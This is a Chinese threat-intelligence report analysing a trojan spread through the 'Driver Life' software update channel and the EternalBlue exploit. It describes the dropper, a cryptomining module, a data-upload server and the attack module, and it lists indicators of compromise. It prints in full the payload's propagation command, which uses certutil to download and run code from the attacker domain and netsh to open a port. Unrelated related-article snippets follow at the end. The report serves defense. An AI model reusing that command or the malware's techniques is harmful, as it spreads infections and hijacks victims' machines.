一、概述

12月14日下午,腾讯安全御见威胁情报中心监测发现,一款通过“驱动人生”升级通道,并同时利用“永恒之蓝”高危漏洞传播的木马突然爆发,仅2个小时受攻击用户就高达10万。

“驱动人生”木马会利用高危漏洞在企业内网呈蠕虫式传播,并进一步下载云控木马,对企业信息安全威胁巨大,企业用户须重点关注。

该病毒爆发刚好是周末时间,令企业网管猝不及防,周一工作日员工电脑开机后,建议立刻查杀病毒,再使用杀毒软件的漏洞修复功能安装系统补丁。个人电脑用户使用腾讯电脑管家即可防御。

木马攻击流程图

二、详细分析

dtlupg.exe访问以下url下载病毒

hxxp://xxxx.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

hxxp://xxxx.update.ackng.com/calendar/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe

(注意,为避免网友点击以上链接直接下载病毒程序,已对部分字符做了隐藏处理)

病毒文件释放在:

“C:Program Files (x86)DTLSoft iliUpdaterctrlf79cb9d2893b254cc75dfb7f3e454a69.exe”等位置执行。

f79cb9d2893b254cc75dfb7f3e454a69.exe 运行后最终释放出 C:WINDOWSTempsvvhost.exe

(MD5:2E9710A4B9CBA3CD11E977AF87570E3B)运行,svvhost.exe打包了“永恒之蓝”等漏洞攻击工具在内外网进一步扩散。

2.1 病毒母体

F79CB9D2893B254CC75DFB7F3E454A69.exe

运行后将自身拷贝到C:windowssystem32svhost.exe,安装为服务并启动,服务名为Ddiver,并在随后拉起云控模块svhhost.exe、攻击模块svvhost.exe。

运行时先检测互斥体,确定是否已感染过。

通过检测以下进程将杀软信息搜集准备上传。

360tray.exe|360sd.exe|avp.exe|KvMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe

检测到任务管理器及游戏进程则将云控模块svhhost.exe退出。

打开互斥体,对象名称为"I am tHe xmr reporter" ,xmr意指xmrig.exe矿机。

搜集系统敏感信息上传到hxxp://i.haqo.net/i.png,并接受返回的云控代码等待执行。

母体设置进程共享内存HSKALWOEDJSLALQEOD

2.2 挖矿

云控木马svhhost.exe其主要功能是,从母体进程svhost.exe共享内存中读取shellcode解密并执行,每隔2000秒读取一次共享内存中的shellcode进行解密执行,共享内存名为HSKALWOEDJSLALQEOD,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行

云控木马执行流程

云控木马运行后会创建一个线程,该线程函数主要功能是判断进程svhost.exe(母体进程)是否存在,不存在的话则启动该进程,接下来要读取的共享内存数据就是从该进程进行读取

调用OpenFileMappingA打开共享内存,读取共享内存数据

读取共享内存数据

调用RtlDecompressBuffer函数解压共享内存中的数据,为下一步执行做准备

解压共享内存数据

共享内存数据加压完后会执行,目前该shellcode主要功能挖矿,不排除后期会拉取其他更加恶意如加密勒索等木马病毒执行

执行shellcode

尝试挖矿时通信IP为172.105.204.237

2.3 攻击模块

攻击模块从地址hxxp://dl.haqo.net/eb.exez下载,作为子进程Svvhost.Exe启动,分析发现该文件是通过python实现的“永恒之蓝”漏洞利用模块压缩打包程序。

子进程Svvhost.Exe为将python实现的“永恒之蓝”漏洞利用模块压缩打包程序。

Mysmb.pyo为攻击时扫描代码。

GitHub上也可以看到相关开源代码

不仅攻击内网漏洞机器,还随机找几个外网IP尝试攻击,1次攻击完后沉默20分钟

攻击成功后paylaod在中招机器执行以下命令进行内网扩散传播

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

IOCs

域名

i.haqo.net

dl.haqo.net

md5

2e9710a4b9cba3cd11e977af87570e3b

74e2a43b2b7c6e258b3a3fc2516c1235

f79cb9d2893b254cc75dfb7f3e454a69

URL

hxxp://dl.haqo.net/eb.exez

hxxp://i.haqo.net/i.png?ID= xxxxx

本文转自高效运维社区,如需转载请标明。

“驱动人生”升级通道传木马,技术分析报告来了相关推荐

  1. “驱动人生”升级现***病毒

    火绒安全等国内网络安全机构的安全团队监测发现,驱动人生旗下多款软件携带后门病毒DTStealer,14日病毒服务器只开放了不到10个小时即关闭,但是已经感染数万台电脑.据火绒威胁情报系统监测,该病毒于 ...

  2. 2021-2027全球及中国燃料电池驱动系统行业研究及十四五规划分析报告

    2021-2027全球及中国燃料电池驱动系统行业研究及十四五规划分析报告 [报告篇幅]:154 [报告图表数]:203 [报告出版时间]:2021年10月 本报告研究"十三五"期间 ...

  3. 关于两款游戏的自动寻路及同步技术分析报告

    from: http://wenku.baidu.com/view/cf3353df50e2524de5187e36.html 关于两款游戏的自动寻路及同步技术分析报告 测试环境: 同PC机,双开不同 ...

  4. AUTOSAR技术分析报告

    AUTOSAR简介 汽车电子领域的软件主要属于嵌入式软件.因此,其发展阶段类似于其他嵌入式系统的软件发展.由于受限于嵌入式硬件本身资源的匮乏,各种硬件产品的种类繁多和各自差异,以及整体嵌入式系统软件的 ...

  5. 美国国家安全局(NSA)“酸狐狸”漏洞攻击武器平台技术分析报告

    本文转载自"CVERC "官网  作者:国家计算机病毒应急处理中心 近日,国家计算机病毒应急处理中心对美国家安全局(NSA)"酸狐狸"漏洞攻击武器平台(FoxA ...

  6. 天龙八部技术分析报告

    刘洋 通过一段时间对天龙八部这款游戏进行分析研究,主要从客户端入手,从技术 角度学习天龙八部游戏中各种实现机制.最终写成此文,献给搜狐游戏,以表敬 意. 本文主要分为三个部分,分别是1 天龙八部基本技 ...

  7. 计算机教师专业技术报告,计算机教师专业技术分析报告

    专业技术工作报告 本人于韶关市第二技师学院担任计算机专业教师的工作已经整整五年了,在2011-2016年这五年里我就任现职以来的工作情况作如下分析和总结: 一.基本情况 本人于2011年6月毕业于湛江 ...

  8. 瑞星发布“MSN骗子”病毒技术分析报告

    10月10日,瑞星全球反病毒监测网截获了一个传播速度极快的蠕虫病毒,它可以通过QQ和MSN传播,向线上好友发送"FUNNY.EXE"文件,用户点击后就会中毒.病毒会屏蔽937个主流 ...

  9. 全球及中国双稳态显示驱动IC行业研究及十四五规划分析报告

    [报告篇幅]:131 [报告图表数]:184 [报告出版时间]:2021年12月 报告摘要 2020年,全球双稳态显示驱动IC市场规模达到了 百万美元,预计2027年可以达到 百万美元,年复合增长率( ...

最新文章

  1. float向u8和s8的转换
  2. C#操作NPOI插件的HSSFWorkBook,常见的那些坑
  3. python requests text content_python requests的content和text方法的区别
  4. Linux shell脚本中单双引号的区别
  5. 信息熵与信息增益的理解
  6. Google开源的AR/VR开发库Lullaby
  7. 编程语言之常用的编译器和软件的版本规范
  8. 【2019牛客暑期多校训练营(第二场)- E】MAZE(线段树优化dp,dp转矩阵乘法,线段树维护矩阵乘法)
  9. MySQL Cluster 4个数据节点压力测试--mysqlslap工具压400W写
  10. python rest api client_Python py-jama-rest-client包_程序模块 - PyPI - Python中文网
  11. Atitit 流水线子线程异常处理 1.1. 大概原理是 FutureTask排除异常 FutureTask.get can throw ExecutionException,can catc
  12. Kali安装Nessus
  13. java版微信三级分销完整源码
  14. hp服务器进智能配置是红屏,illegal opcode 红屏报错(hp 360 G6安装win2003)问题解决方法...
  15. bais mintigation post-processing for individual and group fairness
  16. oracle数据库merge into,merge into 的用法
  17. CKA考试笔记,仅做个人学习使用
  18. 【Git配置技巧】01. 配置文件git config介绍
  19. 求一亿个数字里面最小的10个数字
  20. 关于Eric Steven Raymond的五部曲

热门文章

  1. 网络编程(2) - 网络通信方式-TCP
  2. web移动端安卓和ios兼容问题
  3. torch模块常用方法总结
  4. 好家园房产中介网后台管理项目
  5. php微信h5支付demo,微信h5支付 demo-HTML5微信支付DEMO下载 最新版--pc6下载站
  6. Ubuntu的安装、更新、下载软件命令
  7. termux获取sd卡读写权限_原来是用错了读卡器,雷克沙lexar 1667X 真实读写性能测试...
  8. J9数字论:如何避免踩雷多头陷阱?
  9. 安装爱剪辑计算机丢失,windows10系统下安装“爱剪辑”软件的方法
  10. ivor horton《c语言入门经典》,《C语言入门经典》Ivor Horton第九章练习题